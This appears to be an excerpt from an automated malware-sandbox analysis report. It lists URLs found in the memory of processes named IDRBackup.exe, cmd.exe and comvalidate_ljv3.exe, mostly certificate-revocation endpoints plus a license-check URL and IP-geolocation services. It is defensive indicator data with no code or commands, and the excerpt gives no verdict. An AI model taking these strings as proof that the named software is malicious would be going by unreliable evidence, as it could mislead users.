                      Source: IDRBackup.exe, 00000002.00000003.1793159344.000000000422C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                      Source: IDRBackup.exe, 00000002.00000003.1793774333.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794337701.0000000004229000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793634673.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795170834.0000000004221000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795306287.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793866976.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794674843.0000000004221000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/EVCodeSigning-g1.crl0K
                      Source: IDRBackup.exe, 00000002.00000003.1793774333.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794337701.0000000004229000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793634673.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795170834.0000000004221000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795306287.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793866976.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794674843.0000000004221000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
                      Source: IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
                      Source: IDRBackup.exe, 00000002.00000003.1793774333.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794337701.0000000004229000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793634673.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795170834.0000000004221000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795306287.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793866976.0000000000840000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                      Source: IDRBackup.exe, 00000002.00000003.1794674843.0000000004221000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://epscd.catcert.net/crl/ec-acc.crl
                      Source: IDRBackup.exe, 00000002.00000003.1794674843.0000000004221000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://epscd2.catcert.net/crl/ec-acc.crl0
                      Source: IDRBackup.exe, 00000002.00000000.1679158396.0000000000401000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: http://idrlicense.itopupdate.com/check.php
                      Source: IDRBackup.exe, 00000002.00000000.1679158396.0000000000401000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: http://ip-api.com/
                      Source: IDRBackup.exe, 00000002.00000000.1679158396.0000000000401000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: http://ip-api.com/json/
                      Source: IDRBackup.exe, 00000002.00000000.1679158396.0000000000401000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: http://ipinfo.io/
                      Source: IDRBackup.exe, 00000002.00000003.1794674843.0000000004221000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.catcert.cat05
                      Source: IDRBackup.exe, 00000002.00000003.1793159344.000000000422C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793159344.000000000422C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                      Source: IDRBackup.exe, 00000002.00000003.1793774333.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794337701.0000000004229000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793634673.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795170834.0000000004221000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795306287.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793866976.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794674843.0000000004221000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793159344.000000000422C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                      Source: IDRBackup.exe, 00000002.00000003.1793774333.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794337701.0000000004229000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793634673.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795170834.0000000004221000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795306287.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793866976.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794674843.0000000004221000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
                      Source: IDRBackup.exe, 00000002.00000003.1793774333.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794337701.0000000004229000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793634673.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795170834.0000000004221000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795306287.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793866976.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794674843.0000000004221000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793159344.000000000422C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
                      Source: IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
                      Source: IDRBackup.exe, 00000002.00000003.1793774333.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794337701.0000000004229000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793634673.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795170834.0000000004221000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795306287.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793866976.0000000000840000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                      Source: IDRBackup.exe, 00000002.00000003.1793159344.000000000422C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                      Source: cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                      Source: cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                      Source: cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                      Source: cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                      Source: IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                      Source: IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
                      Source: IDRBackup.exe, 00000002.00000002.1820475925.0000000059801000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                      Source: cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                      Source: cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                      Source: cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                      Source: IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
                      Source: IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
                      Source: IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
                      Source: IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2631544073.00000001401E0000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.???.xx/?search=%s
                      Source: IDRBackup.exe, 00000002.00000003.1794674843.0000000004221000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.catcert.cat/descarrega/acc.crt0b
                      Source: IDRBackup.exe, 00000002.00000003.1793774333.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794337701.0000000004229000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793634673.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795170834.0000000004221000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795306287.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793866976.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793159344.000000000422C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                      Source: IDRBackup.exe, 00000002.00000003.1793774333.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794337701.0000000004229000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793634673.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795170834.0000000004221000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795306287.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793866976.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794674843.0000000004221000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                      Source: IDRBackup.exe, 00000002.00000002.1802356275.000000000359A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.0000000004960000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.0000000002643000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.0000000005012000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BB4000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.0000000002597000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
                      Source: IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2631544073.00000001401E0000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.com
                      Source: cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000000.2210893352.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000000.2808211879.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.com/?Download=Find.Same.Images.OK
                      Source: cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000000.2210893352.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000000.2808211879.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.com/?Freeware/Find.Same.Images.OK
                      Source: cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000000.2210893352.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000000.2808211879.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.com/?Freeware/Find.Same.Images.OK/History
                      Source: cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000000.2210893352.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000000.2808211879.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.com/?seite=faq-Find.Same.Images.OK&faq=0
                      Source: IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2631544073.00000001401E0000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.de
                      Source: cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000000.2210893352.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000000.2808211879.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.de/?Download=Find.Same.Images.OK
                      Source: cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000000.2210893352.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000000.2808211879.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.de/?Freeware/Find.Same.Images.OK
